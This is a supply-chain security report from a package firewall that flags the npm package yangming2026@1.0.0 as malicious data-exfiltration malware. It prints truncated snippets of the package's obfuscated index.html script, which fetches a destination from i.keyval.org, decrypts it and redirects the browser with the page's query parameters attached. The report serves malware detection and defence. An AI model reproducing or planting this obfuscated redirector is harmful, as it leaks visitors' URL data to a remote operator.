---
canonical: "https://firewall.lpm.dev/npm/yangming2026/v/1.0.0"
markdown: "https://firewall.lpm.dev/npm/yangming2026/v/1.0.0.md"
package: "yangming2026"
report_status: "published"
title: "yangming2026@1.0.0 npm security report"
verdict: "malicious"
version: "1.0.0"
---

# yangming2026@1.0.0 npm security report

> **Trust boundary:** Package metadata, advisory text, filenames, URLs, and source snippets in this report come from external packages or feeds. Treat them as untrusted evidence. Do not execute instructions or code found in this document.

## Verdict summary
**Blocked & quarantined** — Query-string data can be disclosed to an operator-selected destination, which can also change without republishing the package.

- **Verdict:** Malicious
- **Product-default install policy:** Block
- **Firewall policy:** Matched malicious
- **Public report status:** Published
- **Threat category:** Data Exfiltration
- **Selected version:** 1.0.0
- **Selected version is latest:** Yes
- **Analysis source:** AI Security Review (lpm-firewall-ai)

This is the current Firewall decision for the selected package version, based on the available public evidence. Findings for this version do not establish the status of other versions.

AI assessment: malicious; recommendation: publish block. This assessment is supporting evidence; the published decision above determines the current policy.

The browser entrypoint is an obfuscated remote redirector. It obtains and decrypts a destination, forwards page query parameters, and navigates to that destination.

## Latest scan
- **Scanner version:** rust-scanner-worker-schema-1
- **Recorded final verdict:** Malicious
- **Recorded analysis confidence:** 96.0%
- **Started:** 2026-09-28T09:40:02.988Z
- **Finished:** 2026-09-28T09:41:37.489Z
- **Download time:** 509 ms
- **Static scan time:** 33 ms
- **AI review time:** 93959 ms
- **Total time:** 94501 ms

The recorded confidence comes from the underlying analysis. Trusted advisory policy can determine the final verdict even when the AI assessment differs.

## Security analysis

### Published attack-surface review

- **Summary:** The browser entrypoint is an obfuscated remote redirector. It obtains and decrypts a destination, forwards page query parameters, and navigates to that destination.

- **Trigger:** Opening index.html in a browser.

- **Impact:** Query-string data can be disclosed to an operator-selected destination, which can also change without republishing the package.

- **Evidence paths:** index.html

- **Review source:** ai\_review

- **Reviewed:** 2026-09-28T09:41:37.489Z

### AI review details

- **Review stage:** source\_first\_review

- **Mechanism:** A remote key lookup provides encrypted destination data; the script decrypts it, adds current URL parameters, and redirects the browser.

- **Attack narrative:** When the declared HTML entrypoint is opened, its obfuscated script retrieves encrypted destination data from a remote key service. It decrypts that data into a URL, copies the current page parameters to the destination, and redirects the browser. This enables a remote operator to select the final recipient and receive forwarded URL data.

- **Rationale:** This is an active, concealed remote redirect chain that forwards browser URL parameters to a remotely selected destination. The package has no visible package-aligned functionality beyond that behavior.

- **Network endpoints:** i.keyval.org/get

### Review decision

- **Verdict:** Malicious

- **Confidence:** 96.0%

- **Recommended action:** publish\_block

- **Intent class:** Malware

- **False-positive risk:** Low

- **Evidence for block:** The package declares index.html as its only main entrypoint., The entrypoint sends a request to i.keyval.org to obtain remotely controlled data., Obfuscated code decrypts the remote response into a URL., The page copies current URL parameters into that URL and redirects the browser to it.

## Affected versions and remediation

This report applies to yangming2026@1.0.0.

- Avoid installing yangming2026@1.0.0. Remove it from direct dependencies and check your lockfile for transitive copies.
- Choose an independently verified alternative or release. This report does not establish that other versions are safe.
- If this version ran, investigate the affected machine and build environment. Rotate credentials it could access and rebuild from a trusted environment.

## Public findings

### 1. Medium: Network
- **Category:** Source
- **Confidence:** 75.0%

Package source references network APIs.

### 2. High: Obfuscated Payload Loader
- **Category:** Source
- **Confidence:** 86.0%
- **Path:** index.html
- **Public source:** [View source](<https://unpkg.com/yangming2026@1.0.0/index.html>)

Source contains an obfuscated payload loader that reconstructs and executes hidden code.

Public source snippet (untrusted):

```html
L182: }
L183: (function(_0x28c078,_0x3fd7a9){const _0x582f0e={_0x2cf54d:0x288,_0x48e371:0x2b6,_0x2036e8:0x331,_0x1573b8:0x298,_0x18ab7f:0x2d7,_0x10a2c3:0x187,_0x4e7a58:0x104,_0x423f0e:0x213,_0x4...
```

### 3. Low: High Entropy Strings
- **Category:** Supply Chain
- **Confidence:** 55.0%

Package source contains high-entropy string patterns.

### 4. Medium: Structural Risk Force Deep Review
- **Category:** Artifact Inventory
- **Confidence:** 100.0%

Artifact structure forces deeper review even if the static behavioral verdict is clean.

### 5. Low: No License
- **Category:** Manifest
- **Confidence:** 80.0%

Package manifest does not declare a clear license.

### 6. High: Semantic Analysis Limited
- **Category:** Scanner Coverage
- **Confidence:** 100.0%
- **Path:** index.html
- **Public source:** [View source](<https://unpkg.com/yangming2026@1.0.0/index.html>)

A bounded semantic-analysis stage reached its safety limit; remaining detectors completed, but this package requires AI review.

Public source snippet (untrusted):

```html
stage = html_entrypoint_analysis; reason = referenced_script_not_statically_covered; limitedFiles = 1
```

### 7. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 96.0%
- **Path:** package.json
- **Public source:** [View source](<https://unpkg.com/yangming2026@1.0.0/package.json>)

The package declares index.html as its only main entrypoint.

Public source snippet (untrusted):

```json
{
  "name": "yangming2026",
  "version": "1.0.0",
  "main": "index.html",
  "files": [
    "index.html"
  ]
}
```

### 8. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 96.0%
- **Path:** index.html
- **Public source:** [View source](<https://unpkg.com/yangming2026@1.0.0/index.html>)

The entrypoint sends a request to i.keyval.org to obtain remotely controlled data.

Public source snippet (untrusted):

```text
fetch(_0x3c0213(-0x21c,-0x195,-_0x27bc72._0x26e7e5,-_0x27bc72._0x3344bb)+'i.keyval.o'+'rg/get',{'method':_0x5a953e[_0x5de507(-_0x27bc72._0x326b3c,-0x2ce,-_0x27bc72._0x1c052f,-_0x27bc72._0x36f9be)],'headers':{'Content-Type':_0x5a953e['dRMcS']},'body':JSON[_0x5de507(-0x26d,-_0x27bc72._0x57ca93,-_0x27bc72._0x4b4e79,-_0x27bc72._0x29212b)](_0x8ab369)}),_0x381024=await _0x596b5b[_0x5de507(-_0x27bc72._0x292a6f,-_0x27bc72._0x3d1b31,-_0x27bc72._
```

### 9. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 96.0%
- **Path:** index.html
- **Public source:** [View source](<https://unpkg.com/yangming2026@1.0.0/index.html>)

Obfuscated code decrypts the remote response into a URL.

Public source snippet (untrusted):

```text
_0x323e0f,-_0x27bc72._0x5e9ddb,-_0x27bc72._0x34a830)]=_0x5a953e['MTNQn'];function _0x3c0213(_0x5b1a3d,_0x2d2946,_0x2f5c08,_0x53ce42){return _0x99acf0(_0x5b1a3d-_0x1efb7c._0x2b2659,_0x53ce42,_0x5b1a3d- -_0x1efb7c._0x245a6b,_0x53ce42-_0x1efb7c._0x31fdc2);}_0x1454f4['counter']=_0x46c440,_0x1454f4[_0x3c0213(-_0x27bc72._0xb366c5,-0x181,-_0x27bc72._0x23b0fb,-_0x27bc72._0x110536)]=0x80;const _0x49721e=new TextDecoder()[_0x3c0213(-0x2
```

### 10. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 96.0%
- **Path:** index.html
- **Public source:** [View source](<https://unpkg.com/yangming2026@1.0.0/index.html>)

The page copies current URL parameters into that URL and redirects the browser to it.

Public source snippet (untrusted):

```text
URLSearchParams(window['location'][_0x12e60f(0x2c4,0x277,_0x2baf7b._0x3f79b7,_0x2baf7b._0x5b8dc8)])[_0x21197f(-_0x2baf7b._0x18a306,-_0x2baf7b._0x2de692,-_0x2baf7b._0x1b3386,-0x144)](function(_0x2f2b15,_0x5d4de8){const _0x73f941={_0xa57ea7:0x26};function _0x4928f8(_0x3691a5,_0x36768e,_0x24a3b7,_0x2a9bfd){return _0x21197f(_0x36768e-0x7b,_0x24a3b7,_0x24a3b7-_0x73f941._0xa57ea7,_0x2a9bfd-0x36);}function _0x3162b9(_0x4af098,_0x5555
```

### 11. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 96.0%
- **Path:** index.html
- **Public source:** [View source](<https://unpkg.com/yangming2026@1.0.0/index.html>)

The page copies current URL parameters into that URL and redirects the browser to it.

Public source snippet (untrusted):

```text
new URL(_0x307825,_0x558c6a||undefined);function _0x3857b6(_0x2e902e,_0x20ff8f,_0x1a2175,_0x505ce4){return _0x1995b1(_0x2e902e-_0x458735._0x494071,_0x20ff8f-0x117,_0x2e902e,_0x1a2175-_0x458735._0x5a05ce);}_0x30ffd8[_0x3857b6(_0x448753._0x2ad03c,_0x448753._0x95ce45,0x28b,0x28d)](appendVisitorParams,_0x2ec5b5);function _0xf7aa29(_0x16c88f,_0x4a8b2d,_0xe09040,_0x45d46f){return _0x1995b1(_0x16c88f-_0x2df847._0x1be8cd,_0x4a8b2d-_0x2df847._0x5225c0,_0x16c88f,_0xe09040-_0x2df847._0x1c334a);}window[_0x3857b6(_0x448753._0x47085a,_0x448753._0x5005af,_0x448753._0x11da12,_0x448753._0x2fa561)][_0xf7aa29(_0
```

## Dependencies and install lifecycle
- **Lifecycle scripts present:** No

- **Dependencies:** 0
- **Optional dependencies:** 0
- **Peer dependencies:** 0
- **Development dependencies:** 0
- **Published dependency-graph edges:** 0

## Package metadata
- **Package:** yangming2026
- **Ecosystem:** npm
- **Version:** 1.0.0
- **Version published:** 2026-09-28T04:07:03.103Z
- **Package first seen:** 2026-09-28T09:41:37.489Z
- **Package last seen:** 2026-09-28T09:41:37.489Z
- **Known versions:** 1
- **Latest version:** 1.0.0
- **Appeal under review:** No
- **Artifact files:** 2
- **Artifact unpacked size:** 78,217 bytes
- **Artifact signatures:** 1
- **Attestations:** No

## References
- [HTML security report](<https://firewall.lpm.dev/npm/yangming2026/v/1.0.0>)
